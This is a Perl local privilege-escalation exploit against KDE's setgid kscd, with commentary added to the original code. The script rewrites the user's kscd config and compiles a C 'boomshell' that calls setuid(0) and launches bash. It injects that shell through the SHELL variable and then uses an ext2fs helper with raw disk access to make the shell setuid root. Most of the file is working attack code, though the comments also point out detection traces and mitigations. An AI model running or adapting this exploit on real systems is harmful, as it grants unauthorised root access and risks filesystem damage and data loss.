#!/usr/bin/perl

# 7350kscd! The excellent kscd-hack :)
# 
# Bug discovery is due to Sebastian Krahmer,
#	http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets:
#		TESO
#		security.is
#		lam3rz
#		29A
#		Mike and Silvio.
#
# Special thanx to
#
# C.P. 		  -- 	roots, bloody roots }|-] 
# Michal Zalewski --	No sex causes what? I can't decipher the pic ... :PP
#
# Description:
#
# kscd local root exploit. kscd belongs to the KDE multimedia-pack. (stupid)
# As so often with GUIs, kscd is setgid-disk and gets the shell for
# a browser-execution via the SHELL environment variable. So, we set it
# to /tmp/boomshell, which will make ext2fs setgid-disk. Then we use
# ext2fs to change /tmp/boomshell to a setuid-root file via raw-filesystem
# access (we are group disk!). Please make sure you have
#
# a) ext2fs-lib installed (default)
# b) kscd setgid disk (default e.g. on SuSE 6.4)
# c) a CD in drive (hmmm ...)
# d) /tmp points to a disk where setuids are allowed (default)
# e) brain and responsibility (unfortunately not default)
#
# Note that the change via ext2fs takes effect after the next re-mount (e.g. 'reboot')
# We assume that group disk has GID 6. Change if necessary.
#
#
# Warning: You are playing with your filesystem! This can cause data-loss.
#          Use a zip-disk for playing! YOU USE IT AT YOUR OWN RISK!
#	   For educational purposes only!	
#
# This exploit goes under the GPL!
#

# Print the command-line synopsis to STDOUT and stop with status 0.
# Reached when the script is started without a device argument.
sub usage
{
	my $prog = $0;
	my $text = "Usage: $prog <device_where_tmp_is (/dev/hdaX)>\n";
	print $text;
	exit 0;
}

# Script body, executed at load time. The file declares neither `use strict`
# nor `use warnings`, so $disk and $kde below are package globals.
#
# The single argument is the block device holding /tmp. It is only ever
# passed through to /tmp/ext2fs at the very end (list-form exec, so it is
# not shell-expanded), but it is never checked to actually name a device.
$disk = shift or usage();

# Per-user kscd configuration file. $HOME is taken from the environment
# unvalidated and spliced into a 2-arg open below, so a HOME beginning with
# '>' would alter the open mode (e.g. append) instead of the path.
$kde = $ENV{'HOME'}."/.kde/share/config/kscdrc";

# The user's existing kscdrc is removed outright (no backup) before being
# rewritten. From a defender's view, an unexpected rewrite of
# ~/.kde/share/config/kscdrc together with the /tmp artifacts created
# further down is the on-disk trace this script leaves behind.
unlink $kde;

# Build the ext2fs helper. ext2fs.c is not part of this file (presumably it
# sits in the current directory). Backticks in void context: compiler output
# and exit status are thrown away, so a missing compiler, libext2fs or source
# file only shows up when the exec at the bottom fails.
`cc ext2fs.c -lext2fs -o /tmp/ext2fs`;

# create kscd config-file -- necessary
# Bareword handle and 2-arg open (see the note on $kde above). The heredoc
# is written verbatim; which of these keys kscd actually reads is not
# established anywhere on this page.
open O, ">$kde" or die "Can't open config-file of kscd!\n";
print O<<_EOF_;
# KDE Config File
[SMTP]
enabled=true
serverHost=localhost
serverPort=25
[CDDB]
CurrentServer=www.cddb.com cddbp 8880 -
HTTPProxyHost=
CDDBRemoteEnabled=0
SeverList=www.cddb.com cddbp 8880 -,
CDDBHTTPProxyEnabled=0
HTTPProxyPort=0
LocalBaseDir=/opt/kde/share/apps/kscd/cddb/
[MAGIC]
magicwidth=320
magicheight=200
magicbrightness=3
[General]
ToolTips=1
RandomPlay=0
DOCKING=1
AUTOPLAY=0
CDDevice=/dev/cdrom
CustomBroserCmd=
BackColor=0,0,0
AUTODOCK=0
Volume=40
EJECTONFINISH=0
USEKFM=0
STOPEXIT=1
LEDColor=226,224,255
UnixMailCommand=owned
_EOF_
close O;	# unchecked; buffered write errors on a write handle surface here

# drop boomshell
# Writes the C source of the program that kscd will be handed as its SHELL.
# What the visible C does: setuid(0)/setgid(0) are called with their return
# values ignored; if the process is still not uid 0 afterwards, it chowns
# /tmp/ext2fs to the invoking uid and the hard-coded gid 6 (assumed to be
# group disk, per the header) and sets mode 02755 (setgid) on it, then
# returns; if it is uid 0 it execve()s /bin/bash with a NULL environment.
open O, ">/tmp/boomshell.c" or die "Can't open /tmp/boomshell!\n";
print O<<_EOF_;
#include <stdio.h>

int main()
{
	char *a[] = {
		"/bin/bash",
		NULL
	};
	setuid(0);
	setgid(0);
	
	/* in case we are invoked by kscd */
	if (getuid() != 0) {
		chown("/tmp/ext2fs", getuid(), 6);
		chmod("/tmp/ext2fs", 02755);
		return 0;
	}

	execve(*a, a, NULL);
	return 0;
}
_EOF_
close O;

# Compiled the same way as ext2fs above: output and exit status discarded.
`cc /tmp/boomshell.c -o /tmp/boomshell`;

# Environment handed down to kscd. SHELL is the injection point the header
# describes: the setgid kscd inherits SHELL from its caller and uses it to
# launch the browser, so whatever SHELL names runs with kscd's group.
# Mitigation on the kscd side is not to honour a caller-supplied SHELL (or
# not to be setgid at all); on a host, a privileged process spawning its
# SHELL from under /tmp is the behaviour worth alerting on.
$ENV{'PATH'}="/opt/kde/bin:".$ENV{'PATH'};
$ENV{'SHELL'}="/tmp/boomshell";

# The next step needs the user to click through kscd's GUI; the script has
# no way of telling whether that actually happened.
print "Invoking kscd now.\n";
print "Click [i] -> [Information] -> [Ultimate Bandlist]\n";
print "Exit kscd then.\nI will do the rest.\n";

# kscd's stdout is captured and thrown away; its exit status is not examined.
`kscd`;

print "Execute /tmp/boomshell after next reboot.\n";
# ext2fs should be setgid-disk now, which lets us make a shell suid
# Replaces this process with the helper. Nothing verifies that /tmp/ext2fs
# really acquired the setgid bit first, and exec carries no `or die`, so a
# failure to exec is silent.
exec "/tmp/ext2fs", $disk, "/tmp/boomshell";


